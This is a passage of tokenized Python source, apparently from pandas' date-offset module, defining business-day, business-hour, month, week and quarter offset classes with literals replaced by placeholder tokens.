( ) > <NUM_LIT:4> : <EOL> n -= <NUM_LIT:1> <EOL> while n != <NUM_LIT:0> : <EOL> k = n // abs ( n ) <EOL> result = result + timedelta ( k ) <EOL> if result . weekday ( ) < <NUM_LIT:5> : <EOL> n -= k <EOL> if self . offset : <EOL> result = result + self . offset <EOL> return result <EOL> elif isinstance ( other , ( timedelta , Tick ) ) : <EOL> return BDay ( self . n , offset = self . offset + other , <EOL> normalize = self . normalize ) <EOL> else : <EOL> raise ApplyTypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> time = i . to_perioddelta ( '<STR_LIT:D>' ) <EOL> shifted = ( i . to_perioddelta ( '<STR_LIT:B>' ) - time ) . asi8 != <NUM_LIT:0> <EOL> if self . n > <NUM_LIT:0> : <EOL> roll = np . where ( shifted , self . n - <NUM_LIT:1> , self . n ) <EOL> else : <EOL> roll = self . n <EOL> return ( i . to_period ( '<STR_LIT:B>' ) + roll ) . to_timestamp ( ) + time <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return dt . weekday ( ) < <NUM_LIT:5> <EOL> class BusinessHourMixin ( BusinessMixin ) : <EOL> def __init__ ( self , ** kwds ) : <EOL> kwds [ '<STR_LIT:start>' ] = self . _validate_time ( kwds . get ( '<STR_LIT:start>' , '<STR_LIT>' ) ) <EOL> kwds [ '<STR_LIT:end>' ] = self . _validate_time ( kwds . get ( '<STR_LIT:end>' , '<STR_LIT>' ) ) <EOL> self . kwds = kwds <EOL> self . offset = kwds . get ( '<STR_LIT>' , timedelta ( <NUM_LIT:0> ) ) <EOL> self . start = kwds . get ( '<STR_LIT:start>' , '<STR_LIT>' ) <EOL> self . end = kwds . get ( '<STR_LIT:end>' , '<STR_LIT>' ) <EOL> def _validate_time ( self , t_input ) : <EOL> from datetime import time as dt_time <EOL> import time <EOL> if isinstance ( t_input , compat . string_types ) : <EOL> try : <EOL> t = time . strptime ( t_input , '<STR_LIT>' ) <EOL> return dt_time ( hour = t . tm_hour , minute = t . tm_min ) <EOL> except ValueError : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif isinstance ( t_input , dt_time ) : <EOL> if t_input . second != <NUM_LIT:0> or t_input . microsecond != <NUM_LIT:0> : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> return t_input <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _get_daytime_flag ( self ) : <EOL> if self . start == self . end : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> elif self . start < self . end : <EOL> return True <EOL> else : <EOL> return False <EOL> def _next_opening_time ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not self . next_bday . onOffset ( other ) : <EOL> other = other + self . next_bday <EOL> else : <EOL> if self . n >= <NUM_LIT:0> and self . start < other . time ( ) : <EOL> other = other + self . next_bday <EOL> elif self . n < <NUM_LIT:0> and other . time ( ) < self . start : <EOL> other = other + self . next_bday <EOL> return datetime ( other . year , other . month , other . day , <EOL> self . start . hour , self . start . minute ) <EOL> def _prev_opening_time ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not self . next_bday . onOffset ( other ) : <EOL> other = other - self . next_bday <EOL> else : <EOL> if self . n >= <NUM_LIT:0> and other . time ( ) < self . start : <EOL> other = other - self . next_bday <EOL> elif self . n < <NUM_LIT:0> and other . time ( ) > self . start : <EOL> other = other - self . next_bday <EOL> return datetime ( other . year , other . month , other . day , <EOL> self . start . hour , self . start . minute ) <EOL> def _get_business_hours_by_sec ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _get_daytime_flag ( ) : <EOL> dtstart = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:1> , self . start . hour , self . start . minute ) <EOL> until = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:1> , self . end . hour , self . end . minute ) <EOL> return tslib . tot_seconds ( until - dtstart ) <EOL> else : <EOL> self . daytime = False <EOL> dtstart = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:1> , self . start . hour , self . start . minute ) <EOL> until = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:2> , self . end . hour , self . end . minute ) <EOL> return tslib . tot_seconds ( until - dtstart ) <EOL> @ apply_wraps <EOL> def rollback ( self , dt ) : <EOL> """<STR_LIT>""" <EOL> if not self . onOffset ( dt ) : <EOL> businesshours = self . _get_business_hours_by_sec ( ) <EOL> if self . n >= <NUM_LIT:0> : <EOL> dt = self . _prev_opening_time ( <EOL> dt ) + timedelta ( seconds = businesshours ) <EOL> else : <EOL> dt = self . _next_opening_time ( <EOL> dt ) + timedelta ( seconds = businesshours ) <EOL> return dt <EOL> @ apply_wraps <EOL> def rollforward ( self , dt ) : <EOL> """<STR_LIT>""" <EOL> if not self . onOffset ( dt ) : <EOL> if self . n >= <NUM_LIT:0> : <EOL> return self . _next_opening_time ( dt ) <EOL> else : <EOL> return self . _prev_opening_time ( dt ) <EOL> return dt <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> daytime = self . _get_daytime_flag ( ) <EOL> businesshours = self . _get_business_hours_by_sec ( ) <EOL> bhdelta = timedelta ( seconds = businesshours ) <EOL> if isinstance ( other , datetime ) : <EOL> nanosecond = getattr ( other , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> other = datetime ( other . year , other . month , other . day , <EOL> other . hour , other . minute , <EOL> other . second , other . microsecond ) <EOL> n = self . n <EOL> if n >= <NUM_LIT:0> : <EOL> if ( other . time ( ) == self . end or <EOL> not self . _onOffset ( other , businesshours ) ) : <EOL> other = self . _next_opening_time ( other ) <EOL> else : <EOL> if other . time ( ) == self . start : <EOL> other = other - timedelta ( seconds = <NUM_LIT:1> ) <EOL> if not self . _onOffset ( other , businesshours ) : <EOL> other = self . _next_opening_time ( other ) <EOL> other = other + bhdelta <EOL> bd , r = divmod ( abs ( n * <NUM_LIT> ) , businesshours // <NUM_LIT> ) <EOL> if n < <NUM_LIT:0> : <EOL> bd , r = - bd , - r <EOL> if bd != <NUM_LIT:0> : <EOL> skip_bd = BusinessDay ( n = bd ) <EOL> if not self . next_bday . onOffset ( other ) : <EOL> remain = other - self . _prev_opening_time ( other ) <EOL> other = self . _next_opening_time ( other + skip_bd ) + remain <EOL> else : <EOL> other = other + skip_bd <EOL> hours , minutes = divmod ( r , <NUM_LIT> ) <EOL> result = other + timedelta ( hours = hours , minutes = minutes ) <EOL> if ( ( daytime and ( result . time ( ) < self . start or <EOL> self . end < result . time ( ) ) ) or <EOL> not daytime and ( self . end < result . time ( ) < self . start ) ) : <EOL> if n >= <NUM_LIT:0> : <EOL> bday_edge = self . _prev_opening_time ( other ) <EOL> bday_edge = bday_edge + bhdelta <EOL> bday_remain = result - bday_edge <EOL> result = self . _next_opening_time ( other ) <EOL> result += bday_remain <EOL> else : <EOL> bday_edge = self . _next_opening_time ( other ) <EOL> bday_remain = result - bday_edge <EOL> result = self . _next_opening_time ( result ) + bhdelta <EOL> result += bday_remain <EOL> if n >= <NUM_LIT:0> : <EOL> if result . time ( ) == self . end : <EOL> result = self . _next_opening_time ( result ) <EOL> else : <EOL> if result . time ( ) == self . start and nanosecond == <NUM_LIT:0> : <EOL> result = self . _next_opening_time ( <EOL> result - timedelta ( seconds = <NUM_LIT:1> ) ) + bhdelta <EOL> return result <EOL> else : <EOL> raise ApplyTypeError ( <EOL> '<STR_LIT>' ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> if dt . tzinfo is not None : <EOL> dt = datetime ( dt . year , dt . month , dt . day , dt . hour , <EOL> dt . minute , dt . second , dt . microsecond ) <EOL> businesshours = self . _get_business_hours_by_sec ( ) <EOL> return self . _onOffset ( dt , businesshours ) <EOL> def _onOffset ( self , dt , businesshours ) : <EOL> """<STR_LIT>""" <EOL> if self . n >= <NUM_LIT:0> : <EOL> op = self . _prev_opening_time ( dt ) <EOL> else : <EOL> op = self . _next_opening_time ( dt ) <EOL> span = tslib . tot_seconds ( dt - op ) <EOL> if span <= businesshours : <EOL> return True <EOL> else : <EOL> return False <EOL> def _repr_attrs ( self ) : <EOL> out = super ( BusinessHourMixin , self ) . _repr_attrs ( ) <EOL> start = self . start . strftime ( '<STR_LIT>' ) <EOL> end = self . end . strftime ( '<STR_LIT>' ) <EOL> attrs = [ '<STR_LIT>' . format ( prefix = self . _prefix , <EOL> start = start , end = end ) ] <EOL> out += '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( attrs ) <EOL> return out <EOL> class BusinessHour ( BusinessHourMixin , SingleConstructorOffset ) : <EOL> """<STR_LIT>""" <EOL> _prefix = '<STR_LIT>' <EOL> _anchor = <NUM_LIT:0> <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> super ( BusinessHour , self ) . __init__ ( ** kwds ) <EOL> if self . n >= <NUM_LIT:0> : <EOL> nb_offset = <NUM_LIT:1> <EOL> else : <EOL> nb_offset = - <NUM_LIT:1> <EOL> self . next_bday = BusinessDay ( n = nb_offset ) <EOL> class CustomBusinessDay ( BusinessDay ) : <EOL> """<STR_LIT>""" <EOL> _cacheable = False <EOL> _prefix = '<STR_LIT:C>' <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , weekmask = '<STR_LIT>' , <EOL> holidays = None , calendar = None , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> self . kwds = kwds <EOL> self . offset = kwds . get ( '<STR_LIT>' , timedelta ( <NUM_LIT:0> ) ) <EOL> calendar , holidays = self . get_calendar ( weekmask = weekmask , <EOL> holidays = holidays , <EOL> calendar = calendar ) <EOL> self . kwds [ '<STR_LIT>' ] = self . weekmask = weekmask <EOL> self . kwds [ '<STR_LIT>' ] = self . holidays = holidays <EOL> self . kwds [ '<STR_LIT>' ] = self . calendar = calendar <EOL> def get_calendar ( self , weekmask , holidays , calendar ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( calendar , np . busdaycalendar ) : <EOL> if not holidays : <EOL> holidays = tuple ( calendar . holidays ) <EOL> elif not isinstance ( holidays , tuple ) : <EOL> holidays = tuple ( holidays ) <EOL> else : <EOL> pass <EOL> return calendar , holidays <EOL> if holidays is None : <EOL> holidays = [ ] <EOL> try : <EOL> holidays = holidays + calendar . holidays ( ) . tolist ( ) <EOL> except AttributeError : <EOL> pass <EOL> holidays = [ self . _to_dt64 ( dt , dtype = '<STR_LIT>' ) for dt in <EOL> holidays ] <EOL> holidays = tuple ( sorted ( holidays ) ) <EOL> kwargs = { '<STR_LIT>' : weekmask } <EOL> if holidays : <EOL> kwargs [ '<STR_LIT>' ] = holidays <EOL> busdaycalendar = np . busdaycalendar ( ** kwargs ) <EOL> return busdaycalendar , holidays <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> state = self . __dict__ . copy ( ) <EOL> del state [ '<STR_LIT>' ] <EOL> try : <EOL> state [ '<STR_LIT>' ] . pop ( '<STR_LIT>' ) <EOL> except : <EOL> pass <EOL> return state <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ = state <EOL> calendar , holidays = self . get_calendar ( weekmask = self . weekmask , <EOL> holidays = self . holidays , <EOL> calendar = None ) <EOL> self . kwds [ '<STR_LIT>' ] = self . calendar = calendar <EOL> self . kwds [ '<STR_LIT>' ] = self . holidays = holidays <EOL> self . kwds [ '<STR_LIT>' ] = state [ '<STR_LIT>' ] <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> if self . n <= <NUM_LIT:0> : <EOL> roll = '<STR_LIT>' <EOL> else : <EOL> roll = '<STR_LIT>' <EOL> if isinstance ( other , datetime ) : <EOL> date_in = other <EOL> np_dt = np . datetime64 ( date_in . date ( ) ) <EOL> np_incr_dt = np . busday_offset ( np_dt , self . n , roll = roll , <EOL> busdaycal = self . calendar ) <EOL> dt_date = np_incr_dt . astype ( datetime ) <EOL> result = datetime . combine ( dt_date , date_in . time ( ) ) <EOL> if self . offset : <EOL> result = result + self . offset <EOL> return result <EOL> elif isinstance ( other , ( timedelta , Tick ) ) : <EOL> return BDay ( self . n , offset = self . offset + other , <EOL> normalize = self . normalize ) <EOL> else : <EOL> raise ApplyTypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def apply_index ( self , i ) : <EOL> raise NotImplementedError <EOL> @ staticmethod <EOL> def _to_dt64 ( dt , dtype = '<STR_LIT>' ) : <EOL> if getattr ( dt , '<STR_LIT>' , None ) is not None : <EOL> i8 = tslib . pydt_to_i8 ( dt ) <EOL> dt = tslib . tz_convert_single ( i8 , '<STR_LIT>' , dt . tzinfo ) <EOL> dt = Timestamp ( dt ) <EOL> dt = np . datetime64 ( dt ) <EOL> if dt . dtype . name != dtype : <EOL> dt = dt . astype ( dtype ) <EOL> return dt <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> day64 = self . _to_dt64 ( dt , '<STR_LIT>' ) <EOL> return np . is_busday ( day64 , busdaycal = self . calendar ) <EOL> class CustomBusinessHour ( BusinessHourMixin , SingleConstructorOffset ) : <EOL> """<STR_LIT>""" <EOL> _prefix = '<STR_LIT>' <EOL> _anchor = <NUM_LIT:0> <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , weekmask = '<STR_LIT>' , <EOL> holidays = None , calendar = None , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> super ( CustomBusinessHour , self ) . __init__ ( ** kwds ) <EOL> if self . n >= <NUM_LIT:0> : <EOL> nb_offset = <NUM_LIT:1> <EOL> else : <EOL> nb_offset = - <NUM_LIT:1> <EOL> self . next_bday = CustomBusinessDay ( n = nb_offset , <EOL> weekmask = weekmask , <EOL> holidays = holidays , <EOL> calendar = calendar ) <EOL> self . kwds [ '<STR_LIT>' ] = self . next_bday . weekmask <EOL> self . kwds [ '<STR_LIT>' ] = self . next_bday . holidays <EOL> self . kwds [ '<STR_LIT>' ] = self . next_bday . calendar <EOL> class MonthOffset ( SingleConstructorOffset ) : <EOL> _adjust_dst = True <EOL> @ property <EOL> def name ( self ) : <EOL> if self . isAnchored : <EOL> return self . rule_code <EOL> else : <EOL> return "<STR_LIT>" % ( self . rule_code , _int_to_month [ self . n ] ) <EOL> class MonthEnd ( MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> _ , days_in_month = tslib . monthrange ( other . year , other . month ) <EOL> if other . day != days_in_month : <EOL> other = other + relativedelta ( months = - <NUM_LIT:1> , day = <NUM_LIT> ) <EOL> if n <= <NUM_LIT:0> : <EOL> n = n + <NUM_LIT:1> <EOL> other = other + relativedelta ( months = n , day = <NUM_LIT> ) <EOL> return other <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> shifted = tslib . shift_months ( i . asi8 , self . n , '<STR_LIT:end>' ) <EOL> return i . _shallow_copy ( shifted ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> days_in_month = tslib . monthrange ( dt . year , dt . month ) [ <NUM_LIT:1> ] <EOL> return dt . day == days_in_month <EOL> _prefix = '<STR_LIT:M>' <EOL> class MonthBegin ( MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> if other . day > <NUM_LIT:1> and n <= <NUM_LIT:0> : <EOL> n += <NUM_LIT:1> <EOL> return other + relativedelta ( months = n , day = <NUM_LIT:1> ) <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> shifted = tslib . shift_months ( i . asi8 , self . n , '<STR_LIT:start>' ) <EOL> return i . _shallow_copy ( shifted ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return dt . day == <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> class BusinessMonthEnd ( MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , days_in_month = tslib . monthrange ( other . year , other . month ) <EOL> lastBDay = days_in_month - max ( ( ( wkday + days_in_month - <NUM_LIT:1> ) <EOL> % <NUM_LIT:7> ) - <NUM_LIT:4> , <NUM_LIT:0> ) <EOL> if n > <NUM_LIT:0> and not other . day >= lastBDay : <EOL> n = n - <NUM_LIT:1> <EOL> elif n <= <NUM_LIT:0> and other . day > lastBDay : <EOL> n = n + <NUM_LIT:1> <EOL> other = other + relativedelta ( months = n , day = <NUM_LIT> ) <EOL> if other . weekday ( ) > <NUM_LIT:4> : <EOL> other = other - BDay ( ) <EOL> return other <EOL> _prefix = '<STR_LIT>' <EOL> class BusinessMonthBegin ( MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , _ = tslib . monthrange ( other . year , other . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> if other . day > first and n <= <NUM_LIT:0> : <EOL> n += <NUM_LIT:1> <EOL> elif other . day < first and n > <NUM_LIT:0> : <EOL> other = other + timedelta ( days = first - other . day ) <EOL> n -= <NUM_LIT:1> <EOL> other = other + relativedelta ( months = n ) <EOL> wkday , _ = tslib . monthrange ( other . year , other . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> result = datetime ( other . year , other . month , first , <EOL> other . hour , other . minute , <EOL> other . second , other . microsecond ) <EOL> return result <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> first_weekday , _ = tslib . monthrange ( dt . year , dt . month ) <EOL> if first_weekday == <NUM_LIT:5> : <EOL> return dt . day == <NUM_LIT:3> <EOL> elif first_weekday == <NUM_LIT:6> : <EOL> return dt . day == <NUM_LIT:2> <EOL> else : <EOL> return dt . day == <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> class CustomBusinessMonthEnd ( BusinessMixin , MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> _cacheable = False <EOL> _prefix = '<STR_LIT>' <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , weekmask = '<STR_LIT>' , <EOL> holidays = None , calendar = None , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> self . kwds = kwds <EOL> self . offset = kwds . get ( '<STR_LIT>' , timedelta ( <NUM_LIT:0> ) ) <EOL> self . cbday = CustomBusinessDay ( n = self . n , normalize = normalize , <EOL> weekmask = weekmask , holidays = holidays , <EOL> calendar = calendar , ** kwds ) <EOL> self . m_offset = MonthEnd ( n = <NUM_LIT:1> , normalize = normalize , ** kwds ) <EOL> self . kwds [ '<STR_LIT>' ] = self . cbday . calendar <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> cur_mend = self . m_offset . rollforward ( other ) <EOL> cur_cmend = self . cbday . rollback ( cur_mend ) <EOL> if n == <NUM_LIT:0> and other != cur_cmend : <EOL> n += <NUM_LIT:1> <EOL> if other < cur_cmend and n >= <NUM_LIT:1> : <EOL> n -= <NUM_LIT:1> <EOL> elif other > cur_cmend and n <= - <NUM_LIT:1> : <EOL> n += <NUM_LIT:1> <EOL> new = cur_mend + n * self . m_offset <EOL> result = self . cbday . rollback ( new ) <EOL> return result <EOL> class CustomBusinessMonthBegin ( BusinessMixin , MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> _cacheable = False <EOL> _prefix = '<STR_LIT>' <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , weekmask = '<STR_LIT>' , <EOL> holidays = None , calendar = None , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> self . kwds = kwds <EOL> self . offset = kwds . get ( '<STR_LIT>' , timedelta ( <NUM_LIT:0> ) ) <EOL> self . cbday = CustomBusinessDay ( n = self . n , normalize = normalize , <EOL> weekmask = weekmask , holidays = holidays , <EOL> calendar = calendar , ** kwds ) <EOL> self . m_offset = MonthBegin ( n = <NUM_LIT:1> , normalize = normalize , ** kwds ) <EOL> self . kwds [ '<STR_LIT>' ] = self . cbday . calendar <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> dt_in = other <EOL> cur_mbegin = self . m_offset . rollback ( dt_in ) <EOL> cur_cmbegin = self . cbday . rollforward ( cur_mbegin ) <EOL> if n == <NUM_LIT:0> and dt_in != cur_cmbegin : <EOL> n += <NUM_LIT:1> <EOL> if dt_in > cur_cmbegin and n <= - <NUM_LIT:1> : <EOL> n += <NUM_LIT:1> <EOL> elif dt_in < cur_cmbegin and n >= <NUM_LIT:1> : <EOL> n -= <NUM_LIT:1> <EOL> new = cur_mbegin + n * self . m_offset <EOL> result = self . cbday . rollforward ( new ) <EOL> return result <EOL> class Week ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . weekday = kwds . get ( '<STR_LIT>' , None ) <EOL> if self . weekday is not None : <EOL> if self . weekday < <NUM_LIT:0> or self . weekday > <NUM_LIT:6> : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> self . weekday ) <EOL> self . _inc = timedelta ( weeks = <NUM_LIT:1> ) <EOL> self . kwds = kwds <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> and self . weekday is not None ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> base = other <EOL> if self . weekday is None : <EOL> return other + self . n * self . _inc <EOL> if self . n > <NUM_LIT:0> : <EOL> k = self . n <EOL> otherDay = other . weekday ( ) <EOL> if otherDay != self . weekday : <EOL> other = other + timedelta ( ( self . weekday - otherDay ) % <NUM_LIT:7> ) <EOL> k = k - <NUM_LIT:1> <EOL> other = other <EOL> for i in range ( k ) : <EOL> other = other + self . _inc <EOL> else : <EOL> k = self . n <EOL> otherDay = other . weekday ( ) <EOL> if otherDay != self . weekday : <EOL> other = other + timedelta ( ( self . weekday - otherDay ) % <NUM_LIT:7> ) <EOL> for i in range ( - k ) : <EOL> other = other - self . _inc <EOL> other = datetime ( other . year , other . month , other . day , <EOL> base . hour , base . minute , base . second , base . microsecond ) <EOL> return other <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> if self . weekday is None : <EOL> return ( ( i . to_period ( '<STR_LIT>' ) + self . n ) . to_timestamp ( ) + <EOL> i . to_perioddelta ( '<STR_LIT>' ) ) <EOL> else : <EOL> return self . _end_apply_index ( i , self . freqstr ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return dt . weekday ( ) == self . weekday <EOL> _prefix = '<STR_LIT>' <EOL> @ property <EOL> def rule_code ( self ) : <EOL> suffix = '<STR_LIT>' <EOL> if self . weekday is not None : <EOL> suffix = '<STR_LIT>' % ( _int_to_weekday [ self . weekday ] ) <EOL> return self . _prefix + suffix <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> if not suffix : <EOL> weekday = None <EOL> else : <EOL> weekday = _weekday_to_int [ suffix ] <EOL> return cls ( weekday = weekday ) <EOL> class WeekDay ( object ) : <EOL> MON = <NUM_LIT:0> <EOL> TUE = <NUM_LIT:1> <EOL> WED = <NUM_LIT:2> <EOL> THU = <NUM_LIT:3> <EOL> FRI = <NUM_LIT:4> <EOL> SAT = <NUM_LIT:5> <EOL> SUN = <NUM_LIT:6> <EOL> _int_to_weekday = { <EOL> WeekDay . MON : '<STR_LIT>' , <EOL> WeekDay . TUE : '<STR_LIT>' , <EOL> WeekDay . WED : '<STR_LIT>' , <EOL> WeekDay . THU : '<STR_LIT>' , <EOL> WeekDay . FRI : '<STR_LIT>' , <EOL> WeekDay . SAT : '<STR_LIT>' , <EOL> WeekDay . SUN : '<STR_LIT>' <EOL> } <EOL> _weekday_to_int = dict ( ( v , k ) for k , v in _int_to_weekday . items ( ) ) <EOL> class WeekOfMonth ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . weekday = kwds [ '<STR_LIT>' ] <EOL> self . week = kwds [ '<STR_LIT>' ] <EOL> if self . n == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if self . weekday < <NUM_LIT:0> or self . weekday > <NUM_LIT:6> : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> self . weekday ) <EOL> if self . week < <NUM_LIT:0> or self . week > <NUM_LIT:3> : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> self . week ) <EOL> self . kwds = kwds <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> base = other <EOL> offsetOfMonth = self . getOffsetOfMonth ( other ) <EOL> if offsetOfMonth > other : <EOL> if self . n > <NUM_LIT:0> : <EOL> months = self . n - <NUM_LIT:1> <EOL> else : <EOL> months = self . n <EOL> elif offsetOfMonth == other : <EOL> months = self . n <EOL> else : <EOL> if self . n > <NUM_LIT:0> : <EOL> months = self . n <EOL> else : <EOL> months = self . n + <NUM_LIT:1> <EOL> other = self . getOffsetOfMonth ( <EOL> other + relativedelta ( months = months , day = <NUM_LIT:1> ) ) <EOL> other = datetime ( other . year , other . month , other . day , base . hour , <EOL> base . minute , base . second , base . microsecond ) <EOL> return other <EOL> def getOffsetOfMonth ( self , dt ) : <EOL> w = Week ( weekday = self . weekday ) <EOL> d = datetime ( dt . year , dt . month , <NUM_LIT:1> , tzinfo = dt . tzinfo ) <EOL> d = w . rollforward ( d ) <EOL> for i in range ( self . week ) : <EOL> d = w . apply ( d ) <EOL> return d <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> d = datetime ( dt . year , dt . month , dt . day , tzinfo = dt . tzinfo ) <EOL> return d == self . getOffsetOfMonth ( dt ) <EOL> @ property <EOL> def rule_code ( self ) : <EOL> return '<STR_LIT>' % ( self . _prefix , self . week + <NUM_LIT:1> , <EOL> _int_to_weekday . get ( self . weekday , '<STR_LIT>' ) ) <EOL> _prefix = '<STR_LIT>' <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> if not suffix : <EOL> raise ValueError ( "<STR_LIT>" % ( cls . _prefix ) ) <EOL> week = int ( suffix [ <NUM_LIT:0> ] ) - <NUM_LIT:1> <EOL> weekday = _weekday_to_int [ suffix [ <NUM_LIT:1> : ] ] <EOL> return cls ( week = week , weekday = weekday ) <EOL> class LastWeekOfMonth ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . weekday = kwds [ '<STR_LIT>' ] <EOL> if self . n == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if self . weekday < <NUM_LIT:0> or self . weekday > <NUM_LIT:6> : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> self . weekday ) <EOL> self . kwds = kwds <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> offsetOfMonth = self . getOffsetOfMonth ( other ) <EOL> if offsetOfMonth > other : <EOL> if self . n > <NUM_LIT:0> : <EOL> months = self . n - <NUM_LIT:1> <EOL> else : <EOL> months = self . n <EOL> elif offsetOfMonth == other : <EOL> months = self . n <EOL> else : <EOL> if self . n > <NUM_LIT:0> : <EOL> months = self . n <EOL> else : <EOL> months = self . n + <NUM_LIT:1> <EOL> return self . getOffsetOfMonth ( <EOL> other + relativedelta ( months = months , day = <NUM_LIT:1> ) ) <EOL> def getOffsetOfMonth ( self , dt ) : <EOL> m = MonthEnd ( ) <EOL> d = datetime ( dt . year , dt . month , <NUM_LIT:1> , dt . hour , dt . minute , <EOL> dt . second , dt . microsecond , tzinfo = dt . tzinfo ) <EOL> eom = m . rollforward ( d ) <EOL> w = Week ( weekday = self . weekday ) <EOL> return w . rollback ( eom ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return dt == self . getOffsetOfMonth ( dt ) <EOL> @ property <EOL> def rule_code ( self ) : <EOL> return '<STR_LIT>' % ( self . _prefix , _int_to_weekday . get ( self . weekday , '<STR_LIT>' ) ) <EOL> _prefix = '<STR_LIT>' <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> if not suffix : <EOL> raise ValueError ( "<STR_LIT>" % ( cls . _prefix ) ) <EOL> weekday = _weekday_to_int [ suffix ] <EOL> return cls ( weekday = weekday ) <EOL> class QuarterOffset ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _default_startingMonth = None <EOL> _from_name_startingMonth = None <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . startingMonth = kwds . get ( '<STR_LIT>' , <EOL> self . _default_startingMonth ) <EOL> self . kwds = kwds <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> and self . startingMonth is not None ) <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> 